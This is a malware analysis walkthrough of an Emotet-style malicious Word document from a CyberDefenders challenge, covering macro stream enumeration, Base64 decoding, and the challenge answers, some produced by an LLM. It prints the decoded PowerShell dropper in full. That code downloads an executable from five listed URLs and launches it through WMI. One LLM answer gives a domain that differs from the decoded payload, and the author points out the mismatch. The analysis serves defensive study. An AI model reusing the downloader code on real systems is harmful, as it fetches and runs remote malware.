Malicious Doc 101


Introduction

After switching from exploit development back to security operations, I’ve turned my focus toward malware analysis. To start off as a refresher, I’ll be going through a basic malicious document analysis. The sample that I am analyzing was taken from CyberDefenders.

In this scenario, we are provided with a malicious document and tasked with analyzing its contents to determine its purpose and capabilities. I will walk through how to analyze the file manually and then demonstrate how an LLM can automate part of the analysis.

Basic Tooling

During this walkthrough, I’ll be using REMnux, a reverse engineering Linux distro that comes preloaded with a curated toolset useful for malware analysis and triage. REMnux removes a lot of the setup friction (installing, configuring, and keeping analysis tools current) so you can focus on the analysis itself. It also helps keep your host clean by letting you run analysis in a controlled VM environment.

The main tools I’ll be using are olevba and oledump.py. olevba is part of oletools, a package of Python tools for analyzing Microsoft OLE2 files (legacy Office documents); oledump.py is a separate script by Didier Stevens that REMnux also ships. oledump.py is great for enumerating OLE streams and finding which streams contain macro code; olevba extracts and analyzes VBA macro source, highlights auto-execution patterns, and decodes common obfuscation.

oledump.py: A script to analyze OLE files (Compound File Binary Format) with a focus on analyzing streams of data.
olevba: A script to parse OLE and OpenXML files (e.g. Word, Excel), detect VBA Macros, extract source code, and flag suspicious patterns and IOCs.

Malicious Document Analysis

Gather Basic Knowledge

When working with a potentially malicious file, the first step is to transfer it to an analysis machine. I’m using REMnux here because I know the sample is malicious: it bundles the tools I need (oletools, yara, strings, CyberChef, etc.), keeps the work isolated from my daily driver, and keeps the setup consistent across analyses.

Once there, I gather basic information about the file, starting with the file command.

Looking at the output, we see that this is a “Composite Document File”, i.e. an OLE file.

I also take the hash of the file and search it in VirusTotal.

remnux@remnux:~/Downloads/temp_extract_dir/MalDoc101$ sha256sum sample.bin 
d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee  sample.bin

Looking at the VirusTotal results, we see the vendor detection score and a family label (Emotet in this case), plus a newer Code insights section that breaks down the macros found in the document.
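The file-type check and the hash can also be reproduced in a few lines of Python. This is a minimal sketch, not what the file or sha256sum commands do internally: it only compares the first eight bytes against the OLE2 / Compound File signature and hashes the content. The function names and the stand-in bytes are hypothetical.

```python
import hashlib

# Signature that opens every OLE2 / Compound File Binary document.
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def triage(data: bytes) -> dict:
    """Return the SHA-256, size, and a quick OLE check for raw file bytes."""
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "is_ole": data.startswith(OLE_MAGIC),
        "size": len(data),
    }


def triage_file(path: str) -> dict:
    """Read a file from disk (path supplied by the caller) and triage it."""
    with open(path, "rb") as handle:
        return triage(handle.read())


if __name__ == "__main__":
    # Stand-in bytes, not the real sample: an OLE header followed by zeros.
    fake_document = OLE_MAGIC + b"\x00" * 504
    print(triage(fake_document))
```

On the analysis VM, triage_file("sample.bin") should report the same SHA-256 that sha256sum printed above, which makes it easy to feed the hash into later tooling.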

OLETools

Now that we’ve identified the file as OLE, the plan is to run olevba for deeper insight. Before that, I use oledump.py to list the streams: OLE streams are the primary containers where macro code, forms, and embedded blobs live. I’m specifically looking for streams flagged M (the stream contains VBA code) or m (a VBA module holding only attribute statements). oledump.py numbers streams in listing order, and in this sample streams 13, 15, and 16 are marked as macro streams:

remnux@remnux:~/Downloads/temp_extract_dir/MalDoc101$ oledump.py sample.bin 
  1:       114 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      7119 '1Table'
  5:    101483 'Data'
  6:       581 'Macros/PROJECT'
  7:       119 'Macros/PROJECTwm'
  8:     12997 'Macros/VBA/_VBA_PROJECT'
  9:      2112 'Macros/VBA/__SRP_0'
 10:       190 'Macros/VBA/__SRP_1'
 11:       532 'Macros/VBA/__SRP_2'
 12:       156 'Macros/VBA/__SRP_3'
 13: M    1367 'Macros/VBA/diakzouxchouz'
 14:       908 'Macros/VBA/dir'
 15: M    5705 'Macros/VBA/govwiahtoozfaid'
 16: m    1187 'Macros/VBA/roubhaol'
 17:        97 'Macros/roubhaol/\x01CompObj'
 18:       292 'Macros/roubhaol/\x03VBFrame'
 19:       510 'Macros/roubhaol/f'
 20:       112 'Macros/roubhaol/i05/\x01CompObj'
 21:        44 'Macros/roubhaol/i05/f'
 22:         0 'Macros/roubhaol/i05/o'
 23:       112 'Macros/roubhaol/i07/\x01CompObj'
 24:        44 'Macros/roubhaol/i07/f'
 25:         0 'Macros/roubhaol/i07/o'
 26:       115 'Macros/roubhaol/i09/\x01CompObj'
 27:       176 'Macros/roubhaol/i09/f'
 28:       110 'Macros/roubhaol/i09/i11/\x01CompObj'
 29:        40 'Macros/roubhaol/i09/i11/f'
 30:         0 'Macros/roubhaol/i09/i11/o'
 31:       110 'Macros/roubhaol/i09/i12/\x01CompObj'
 32:        40 'Macros/roubhaol/i09/i12/f'
 33:         0 'Macros/roubhaol/i09/i12/o'
 34:     15164 'Macros/roubhaol/i09/o'
 35:        48 'Macros/roubhaol/i09/x'
 36:       444 'Macros/roubhaol/o'
 37:      4096 'WordDocument'
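Picking out the macro streams by eye works for one sample, but the same check is easy to script. The sketch below assumes oledump.py's usual line layout of index, optional flag, size, and quoted stream name; the regular expression and the function name are my own, and the embedded listing is a short excerpt rather than the full output.

```python
import re

# Assumed line layout: "<index>: <flag> <size> '<stream name>'".
LINE_RE = re.compile(r"^\s*(\d+):\s*([A-Za-z!]?)\s+(\d+)\s+(.+)$")


def macro_streams(listing: str) -> list:
    """Return (index, flag, size, name) for every stream flagged M or m."""
    hits = []
    for line in listing.splitlines():
        match = LINE_RE.match(line)
        if match and match.group(2) in ("M", "m"):
            index, flag, size, name = match.groups()
            hits.append((int(index), flag, int(size), name.strip("'")))
    return hits


# Excerpt of the listing, with stream indices as referenced in the text.
SAMPLE = """\
 12:       156 'Macros/VBA/__SRP_3'
 13: M    1367 'Macros/VBA/diakzouxchouz'
 14:       908 'Macros/VBA/dir'
 15: M    5705 'Macros/VBA/govwiahtoozfaid'
 16: m    1187 'Macros/VBA/roubhaol'
"""

if __name__ == "__main__":
    for index, flag, size, name in macro_streams(SAMPLE):
        print(index, flag, size, name)
```

Taking the maximum of the returned indices gives the highest macro stream, which is one of the questions asked about this sample later on.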

With that pointer we transition to olevba for extraction and analysis. olevba will pull macro source, flag auto-exec handlers, and try simple deobfuscation for known patterns - it’s an excellent first-pass static tool for macro analysis.

remnux@remnux:~/Downloads/temp_extract_dir/MalDoc101$ olevba sample.bin 
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
olevba 0.60.2 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: sample.bin
Type: OLE

Breaking down the output into sections, we get the following information.

Macros Detected

diakzouxchouz.cls
- Contains Document_Open() auto-execution event
- Calls function: boaxvoebxiotqueb
roubhaol.frm
- Empty macro body
- Contains suspicious form strings used later by the payload
govwiahtoozfaid.bas
- Main payload logic
- Defines multiple functions:
  - boaxvoebxiotqueb
  - juuvzouchmiopxeox
  - geulgelquuuj
  - luumlaud
- Suspicious behaviors:
  - Obfuscation via string concatenation and junk filler (2342772g3&*gs7712ffvs626fq)
  - Uses Replace$ and Split to dynamically rebuild strings
  - Builds object class names / ProgIDs at runtime
  - Calls CreateObject() → likely creates COM objects (e.g., WScript.Shell, MSXML2.XMLHTTP)
  - Stores object references into variables for later execution
  - Execution delay loops: Do While … DoEvents
  - Uses form properties (roubhaol.Zoom, .ControlTipText, .Pages) as hidden payload storage

Embedded Form Data

roubhaol form streams contain random/encoded strings:
- Examples: joopxof, caorfauxleir, foewdaibzian
- Long obfuscated sequences with a repeated marker (2342772g3&*gs7712ffvs626fq)
- Likely encoded payload or shellcode

Key Indicators of Maliciousness

Auto-execution: Document_Open() triggers on file open
Obfuscation: Heavy junk strings + dynamic string reconstruction
Dynamic Object Creation: Multiple CreateObject() calls with obfuscated class names
Hidden Payload: Encoded blobs in form strings (likely second-stage payload)
Anti-analysis tricks: Meaningless event loops with DoEvents
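The indicators above boil down to keyword patterns in the macro source. As a toy approximation of that kind of triage (this is not olevba's actual logic, and the indicator list is deliberately tiny), the following sketch scans VBA text for a few of the patterns mentioned. The snippet is made up for illustration and is not the sample's real source; only the function name boaxvoebxiotqueb comes from the analysis.

```python
import re

# Illustrative indicator list only; olevba's real rule set is far larger.
INDICATORS = {
    "auto-exec": [r"\bDocument_Open\b", r"\bAutoOpen\b"],
    "object creation": [r"\bCreateObject\b"],
    "string rebuilding": [r"\bReplace\$?\s*\(", r"\bSplit\s*\("],
    "delay loop": [r"\bDoEvents\b"],
}


def flag_vba(source: str) -> dict:
    """Map each indicator category to the keywords found in VBA source."""
    found = {}
    for category, patterns in INDICATORS.items():
        hits = [m.group(0) for p in patterns
                for m in re.finditer(p, source, re.IGNORECASE)]
        if hits:
            found[category] = sorted(set(hits))
    return found


# Hypothetical macro text that mimics the patterns described above.
SNIPPET = '''
Private Sub Document_open()
    boaxvoebxiotqueb
End Sub
Function demo()
    x = Split(Replace$(y, "junk", ""), "|")
    Set o = CreateObject(x(0))
    Do While i < 10: DoEvents: i = i + 1: Loop
End Function
'''

if __name__ == "__main__":
    for category, keywords in flag_vba(SNIPPET).items():
        print(category, keywords)
```

A scan like this only tells you where to look; it cannot tell whether CreateObject is being used maliciously, which is why the manual read of govwiahtoozfaid.bas still matters.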

To summarize, this OLE document contains obfuscated VBA macros that will execute boaxvoebxiotqueb() when opened, via Document_Open(), to dynamically reconstruct and execute an embedded payload. The next step is to understand the contents of the encoded blob located in the roubhaol form.

Base64 Decode & Remove Null Bytes

The command is obfuscated with custom padding and Base64 encoding. The obfuscation marker we identified, 2342772g3&*gs7712ffvs626fq, is repeatedly injected into the blob. Removing that padding string leaves a powershell -e command line followed by a Base64 argument. PowerShell expects that argument to be Base64 over UTF-16LE text, so the decoded bytes contain a null byte after every ASCII character; stripping those nulls recovers the embedded PowerShell script.

Recognizing Base64 from the character set and the trailing =, I used the CyberChef recipes Base64 Decode + Remove Null Bytes to deobfuscate the blob and reveal the PowerShell payload, which was still lightly obfuscated.
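The same decoding can be sketched in Python instead of CyberChef. This assumes the blob, once the marker is removed, has the shape "powershell -e" followed by one Base64 argument, as described above. decode_blob is the actual decoding step; make_demo_blob is a hypothetical helper that builds a harmless blob the same way so the round trip can be checked without touching the sample.

```python
import base64

MARKER = "2342772g3&*gs7712ffvs626fq"  # padding string seen in the form data


def decode_blob(blob: str, marker: str = MARKER) -> str:
    """Strip the marker, then decode the Base64 argument of `-e`."""
    cleaned = blob.replace(marker, "")
    # Assumption: the last whitespace-separated token is the Base64 argument.
    encoded = cleaned.split()[-1]
    raw = base64.b64decode(encoded)
    # The argument is UTF-16LE text, so decoding it removes the null bytes.
    return raw.decode("utf-16-le")


def make_demo_blob(command: str, marker: str = MARKER, every: int = 5) -> str:
    """Build a harmless blob with the marker injected every few characters."""
    encoded = base64.b64encode(command.encode("utf-16-le")).decode("ascii")
    plain = "powershell -e " + encoded
    chunks = [plain[i:i + every] for i in range(0, len(plain), every)]
    return marker.join(chunks)


if __name__ == "__main__":
    demo = make_demo_blob("Write-Output 'hello'")
    print(demo[:60] + "...")
    print(decode_blob(demo))
```

Decoding as UTF-16LE is a slightly stricter alternative to deleting null bytes: it produces the same text for ASCII scripts and fails loudly if the bytes are not what we assumed.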

We end up with the following PowerShell command that attempts to hide its capabilities through string obfuscation, junk variables, and redundancy in URLs.

powershell -e
$liechrouhwuw='vuacdouvcioxhaol';
[Net.ServicePointManager]::"SE`cuRiTy`PRO`ToC`ol" = 'tls12, tls11, tls';
$deichbeudreir = '337';
$quoadgoijveum='duuvmoezhaitgoh';
$toehfethxohbaey=$env:userprofile+'\'+$deichbeudreir+'.exe';
$sienteed='quainquachloaz';
$reusthoas=.('n'+'ew-ob'+'ject') nEt.weBclIenT;
$jacleewyiqu='https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/*https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/*http://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/*http://holfve.se/images/1ckw5mj49w_2k11px_d/*http://www.cfm.nl/_backup/yfhrmh6u0heidnwruwha2t4mjz6p_yxhyu390i6_q93hkh3ddm/'."s`PliT"([char]42);$seccierdeeth='duuzyeawpuaqu';
foreach($geersieb in $jacleewyiqu){try{$reusthoas."dOWN`loA`dfi`Le"($geersieb, $toehfethxohbaey);$buhxeuh='doeydeidquaijleuc';
If ((.('Get-'+'Ite'+'m') $toehfethxohbaey)."l`eNGTH" -ge 24751) {([wmiclass]'win32_Process')."C`ReaTe"($toehfethxohbaey);
$quoodteeh='jiafruuzlaolthoic';break;$chigchienteiqu='yoowveihniej'}}catch{}}$toizluulfier='foqulevcaoj'

Step-by-step breakdown of the PowerShell snippet:

Set target download path: %USERPROFILE%\337.exe
Configure TLS support for the web client
Build a WebClient and a list of candidate download URLs (five URLs joined with * in one string, then split on [char]42, which is the * character)
Iterate through candidate URLs, attempt to download to local path
If the downloaded file size is at least 24,751 bytes, create a process via WMI (Win32_Process) to execute the payload
Break the loop once a valid payload is downloaded and executed
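The string tricks in the snippet (backticks inside member names, quoted fragments glued with +, and the [char]42 split) can be undone mechanically. The helpers below are a naive sketch with hypothetical names: they treat the script as plain text and do not parse PowerShell, so they would mangle a script where a backtick is a real escape such as a newline or tab.

```python
import re


def strip_backticks(text: str) -> str:
    """Remove PowerShell backticks used to break up keywords (naive)."""
    return text.replace("`", "")


def join_concatenations(text: str) -> str:
    """Collapse 'a'+'b'+'c' single-quoted concatenations into 'abc'."""
    pattern = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    previous = None
    # Repeat until nothing changes, since each pass merges one pair per chain.
    while previous != text:
        previous = text
        text = pattern.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text


def split_urls(joined: str) -> list:
    """Mirror .Split([char]42): character code 42 is '*'."""
    return [url for url in joined.split(chr(42)) if url]


if __name__ == "__main__":
    print(strip_backticks('"dOWN`loA`dfi`Le"'))
    print(join_concatenations(".('n'+'ew-ob'+'ject') nEt.weBclIenT"))
    print(split_urls("http://a.example/x/*http://b.example/y/"))
```

The example.com-style URLs in the demo are placeholders; running split_urls over the real $jacleewyiqu string yields the five candidate download URLs.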

After relabeling variables and removing junk, the cleaned-up version looks like this:

# Decoded script passed to powershell -e
[Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'
$localFilePath = $env:userprofile + '\337.exe'
$webClient = New-Object Net.WebClient
$malwareUrls = 'https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/*https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/*http://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/*http://holfve.se/images/1ckw5mj49w_2k11px_d/*http://www.cfm.nl/_backup/yfhrmh6u0heidnwruwha2t4mjz6p_yxhyu390i6_q93hkh3ddm/'.Split([char]42)

foreach($currentUrl in $malwareUrls) {
    try {
        $webClient.DownloadFile($currentUrl, $localFilePath)
        If ((Get-Item $localFilePath).Length -ge 24751) {
            ([wmiclass]'win32_Process').Create($localFilePath)
            break
        }
    }
    catch {
    }
} 

Summary of Analysis

SHA256: d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee
File type: OLE / Compound Document (legacy MS Office)
Macro streams found: Streams 13, 15, 16
Auto-exec trigger: Document_Open() in diakzouxchouz.cls
User form name (storage for embedded blob): roubhaol
Encoded blob location: Macros/roubhaol/i09/o (stream 34 contains the big encoded object)
Obfuscation marker/padding string: 2342772g3&*gs7712ffvs626fq (used to mask Base64 payload)
Decoded second-stage: Base64 → PowerShell encoded command (starts with powershell -e) that downloads an executable to %USERPROFILE%\337.exe and validates its size (>= 24,751 bytes)
Execution method for downloaded payload: WMI via Win32_Process (uses .Create() to run the binary)
Observed download domains (examples recovered from payload): haoqunkong.com, techtravel.events, digiwebmarketing.com, holfve.se, cfm.nl (block/monitor these and the specific paths seen in the blob)
Likely family / behavior: Commodity downloader/dropper behavior consistent with Emotet-style distribution (macro → PowerShell → downloader → execution). VirusTotal labels and sample metadata supported the family attribution in this case.
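The domain list in the summary can be derived directly from the URL string recovered from the payload. The sketch below uses only the standard library; extract_hosts and defang are hypothetical helper names, and the defanged form is just a common convention for sharing indicators safely.

```python
from urllib.parse import urlsplit

# URL string as recovered from the decoded PowerShell payload.
URL_LIST = (
    "https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/*"
    "https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/*"
    "http://digiwebmarketing.com/wp-admin/72t0jjhmv7takwvisfnz_eejvf_h6v2ix/*"
    "http://holfve.se/images/1ckw5mj49w_2k11px_d/*"
    "http://www.cfm.nl/_backup/yfhrmh6u0heidnwruwha2t4mjz6p_yxhyu390i6_q93hkh3ddm/"
)


def extract_hosts(joined: str, separator: str = "*") -> list:
    """Return the unique hostnames, in order, from a separator-joined list."""
    hosts = []
    for url in joined.split(separator):
        host = urlsplit(url).hostname
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def defang(host: str) -> str:
    """Make a hostname non-clickable for reports and tickets."""
    return host.replace(".", "[.]")


if __name__ == "__main__":
    for host in extract_hosts(URL_LIST):
        print(defang(host))
```

Note that two of the hostnames carry a www. prefix in the payload, which matters if a blocklist matches on the exact FQDN rather than the registered domain.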

Using LLM to Automate

Now that we did it manually, let’s make it easier by using an LLM to do the work for us. In order to create my prompt, I will be using the R-T-F prompt framework, which stands for:

Role — tell the model who it should be (e.g., Senior Security Analyst). This sets expectations for tone, expertise, and what knowledge the model should emulate.
Task — specify exactly what the model must do (e.g., analyze the provided oledump.py and olevba outputs and extract IOCs, events, and filenames). This is the concrete work to perform.
Format — provide the exact output structure you want (e.g., numbered answers, a CSV, or a YAML IOC block). This prevents ambiguous or verbose responses and makes the results parseable by tools or humans.

Using R-T-F avoids generic prompts and makes results predictable and consistent across runs.

In order to provide the LLM with the required information to answer the questions, I saved the output of olevba and oledump.py to text files (Claude doesn’t accept executables) and supplied the SHA256 plus the text outputs as input.
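If the same analysis is going to be repeated across samples, the R-T-F structure is easy to template. This is a minimal sketch that only assembles the prompt text; build_rtf_prompt and the section separators are my own conventions, not part of any framework or API, and sending the prompt to a model is left out.

```python
def build_rtf_prompt(role: str, task: str, output_format: str,
                     attachments: dict) -> str:
    """Assemble a Role/Task/Format prompt followed by labeled tool outputs."""
    parts = [
        f"Role: {role}",
        f"Task: {task}",
        f"Format: {output_format}",
    ]
    for label, text in attachments.items():
        # Each saved tool output becomes its own clearly labeled section.
        parts.append(f"--- {label} ---\n{text.strip()}")
    return "\n\n".join(parts)


if __name__ == "__main__":
    prompt = build_rtf_prompt(
        role="Senior Security Analyst",
        task="Analyze the oledump.py and olevba outputs and answer the questions.",
        output_format="Numbered answers, one per question.",
        attachments={
            "oledump.py output": " 13: M    1367 'Macros/VBA/diakzouxchouz'",
            "SHA256": "d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee",
        },
    )
    print(prompt)
```

Keeping the tool outputs in labeled sections makes it easier to see afterwards which evidence the model had access to when it produced an answer.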

My prompt was:

You are a Senior Security Analyst with the task of analyzing malware. You are given a malicious document to analyze. Provided to you is the SHA256Hash (d50d98dcc8b7043cb5c38c3de36a2ad62b293704e3cf23b0cd7450174df53fee), the output of oledump.py, and the output of olevba, answer the provided questions about the output. If needed, search online for virus databases for assistance.

Answer the following questions in this format:
Multiple streams contain macros in this document. Provide the number of the highest one. 
What event is used to begin the execution of the macros? 
What malware family was this maldoc attempting to drop? 
What stream is responsible for the storage of the base64-encoded string? 
This document contains a user-form. Provide the name. 
This document contains an obfuscated Base64 encoded string; what value is used to pad (or obfuscate) this string? 
What is the program executed by the Base64 encoded string? 
What WMI class is used to create the process to launch the Trojan? 
Multiple domains were contacted to download a Trojan. Provide the first FQDN as per the provided hint.

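I pressed Enter and, not to my surprise, Claude nailed almost all of it. The exception is answer 9: the domain it reports does not match haoqunkong.com, the first URL in the decoded payload, so LLM-extracted IOCs still need to be checked against the decoded data.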

Full Output:

Based on the analysis of the oledump.py and olevba outputs, here are the answers to your questions:

1. Multiple streams contain macros in this document. Provide the number of the highest one.
Answer: 16
From the oledump output, streams with macros are marked with 'M' or 'm':

Stream 13: M (Macros/VBA/diakzouxchouz)
Stream 15: M (Macros/VBA/govwiahtoozfaid)
Stream 16: m (Macros/VBA/roubhaol)

2. What event is used to begin the execution of the macros?
Answer: Document_open
The VBA code shows Private Sub Document_open() which is an AutoExec event that runs when the Word document is opened.

3. What malware family was this maldoc attempting to drop?
Answer: Emotet
Based on the obfuscation techniques, the base64-encoded PowerShell payload, and the multiple domain download attempts characteristic of Emotet malware distribution.

4. What stream is responsible for the storage of the base64-encoded string?
Answer: 34 (or Macros/roubhaol/i09/o)
The base64-encoded string with the padding "2342772g3&*gs7712ffvs626fq" is stored in stream 34, which corresponds to 'Macros/roubhaol/i09/o'.

5. This document contains a user-form. Provide the name.
Answer: roubhaol
The user form is named "roubhaol" as seen in the VBA MACRO roubhaol.frm and its associated streams.

6. This document contains an obfuscated Base64 encoded string; what value is used to pad (or obfuscate) this string?
Answer: 2342772g3&*gs7712ffvs626fq
This string is repeatedly used throughout the obfuscated base64 content to pad/obfuscate the actual payload.

7. What is the program executed by the Base64 encoded string?
Answer: powershell (or powershell.exe)
After removing the padding, the base64 string begins with "powershell -e" which indicates PowerShell is being executed with an encoded command.

8. What WMI class is used to create the process to launch the Trojan?
Answer: Win32_Process
The deobfuscated code creates "winmgmt:win32_process" (visible in the obfuscated string) which uses the Win32_Process WMI class to create processes.

9. Multiple domains were contacted to download a Trojan. Provide the first FQDN as per the provided hint.
Answer: haoqnonp[.]com
Looking at the base64 content and the embedded URLs, the first domain that appears in the list is "haoqnonp[.]com" (visible in the pattern "https[:]//haoqnonp.com/...").
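LLM answers are easiest to trust when each reported indicator can be traced back to the decoded data. A quick cross-check is sketched below, assuming the evidence is the URL string recovered during the manual analysis (shortened here to its first two entries); refang and appears_in_evidence are hypothetical helper names.

```python
# First two URLs from the decoded payload, used here as the evidence text.
EVIDENCE = (
    "https://haoqunkong.com/bn/s9w4tgcjl_f6669ugu_w4bj/*"
    "https://www.techtravel.events/informationl/8lsjhrl6nnkwgyzsudzam_h3wng_a6v5/"
)


def refang(indicator: str) -> str:
    """Undo common defanging so the indicator can be searched for."""
    return indicator.replace("[.]", ".").replace("[:]", ":")


def appears_in_evidence(indicator: str, evidence: str) -> bool:
    """True if the refanged indicator occurs verbatim in the evidence."""
    return refang(indicator).lower() in evidence.lower()


if __name__ == "__main__":
    for candidate in ("haoqunkong[.]com", "haoqnonp[.]com"):
        print(candidate, appears_in_evidence(candidate, EVIDENCE))
```

The domain recovered manually is found in the evidence, while the one reported in answer 9 is not, which is exactly the kind of mismatch this check is meant to surface before an indicator lands in a blocklist.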

Conclusion

This was a fairly straightforward MalDoc sample that used classic macro tricks: store an obfuscated Base64 blob inside a user form, use an auto-exec Document_Open handler to reconstruct and execute a PowerShell command, and then use PowerShell to download and execute a second-stage binary via WMI. The obfuscation is low-effort (a repeated padding string + Base64), so static analysis is sufficient to recover the payload and extract IOCs without executing the sample.


Roy Blume